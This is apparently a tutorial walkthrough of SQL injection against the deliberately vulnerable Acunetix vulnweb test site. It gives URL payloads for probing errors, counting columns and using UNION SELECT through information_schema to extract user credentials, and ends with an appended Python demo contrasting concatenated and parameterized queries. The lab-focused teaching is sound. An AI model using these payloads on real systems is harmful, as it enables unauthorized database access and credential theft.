Exploiting Acunetix Vulnweb SQL Injection


SQL injection is a technique used by attackers that takes advantage of the improper concatenation of user input parameters with code that interacts directly with database queries.

If you are new to the subject and/or want a more complete explanation, I recommend OWASP or Cloudflare, as the aim here is just to review.

As I already mentioned, we will exploit such flaws on the intentionally vulnerable site vulnweb. When we access the “categories” tab and select one of them we see the change in the URL:

http://testphp.vulnweb.com/listproducts.php?cat=1

Let’s analyze the “cat” parameter, inserting a single quote:

http://testphp.vulnweb.com/listproducts.php?cat=1'

And we get the characteristic SQL syntax error. Almost every time this error is present, the page is vulnerable to in-band SQL injection, since the database error is displayed on the application screen itself.

To proceed, we have to find out the number of columns returned by the vulnerable query:

http://testphp.vulnweb.com/listproducts.php?cat=1 ORDER BY 1,2,3

Ordering by columns 1 through 3 produced no error, so we keep increasing the column number until an error appears.

Since ordering by column 12 fails (that column does not exist), we conclude that the query returns 11 columns.

Then we choose one of them to inject parameters like @@version (or simply version()), in order to list the MySQL version:

http://testphp.vulnweb.com/listproducts.php?cat=-1%20UNION%20SELECT%201,2,3,4,5,6,@@version,8,9,10,11

With the version in hand, an attacker would look for related exploits. But since this is out of scope, let’s move on to user():

http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,2,3,4,5,6,user(),8,9,10,11

To list the tables, we need to understand that there is a standard database in MySQL and the like called information_schema, which contains information (such as tables) about the other schemas.

http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,2,3,4,5,6,table_name,8,9,10,11 FROM information_schema.tables

If we scroll further down, we will see a table called users, which is more relevant to our attack.

In the same way that we use information_schema to enumerate the tables, we will list the columns:

http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,2,3,4,5,6,column_name,8,9,10,11 FROM information_schema.columns WHERE table_name = 'users'

And the application returned the columns as expected. Let’s move on to the uname and pass columns.

And finally we got the credentials directly from the database (which by the way are stored in plain text)!

SQL injection is an extremely critical flaw: in addition to reading sensitive information from the database, the attacker could delete or tamper with it. Therefore, it is essential to use parameterized (prepared) SQL queries whenever the application interacts with the database.
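To make the fix concrete, here is an added example (not code from the article or from the vulnweb site) that reproduces the `cat` parameter defect against a constructed in-memory SQLite schema with a `products` table and a `users` table, and contrasts it with the parameterized version. The table and column names are assumed for illustration, and the query uses two columns instead of the eleven on the real page.

```python
import sqlite3

def make_db():
    """Constructed sample database mimicking the article's scenario."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, cat INTEGER, name TEXT);
        CREATE TABLE users(uname TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 1, 'Lamp'), (2, 2, 'Chair');
        INSERT INTO users VALUES ('test', 'test');  -- plaintext, as on the page
    """)
    return db

def list_products_vulnerable(db, cat):
    # The defect the article describes: user input concatenated into SQL.
    sql = "SELECT id, name FROM products WHERE cat=" + cat
    return db.execute(sql).fetchall()

def list_products_safe(db, cat):
    # Parameterized query: the value is bound by the driver, never parsed as SQL.
    return db.execute("SELECT id, name FROM products WHERE cat=?", (cat,)).fetchall()

def error_for(db, cat):
    """Return the database error text the vulnerable page would leak, or None."""
    try:
        list_products_vulnerable(db, cat)
        return None
    except sqlite3.Error as exc:
        return str(exc)

# The article's UNION technique, adapted to the two-column constructed query.
PAYLOAD = "-1 UNION SELECT uname, pass FROM users"

if __name__ == "__main__":
    db = make_db()
    print("probe 1' ->", error_for(db, "1'"))           # syntax error is leaked
    print("vulnerable ->", list_products_vulnerable(db, PAYLOAD))  # users rows
    print("safe ->", list_products_safe(db, PAYLOAD))   # no rows, no injection
```

The safe variant returns nothing for the payload because the whole string is compared as a value against `cat`, and a legitimate `"1"` still matches as before.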

Thanks!
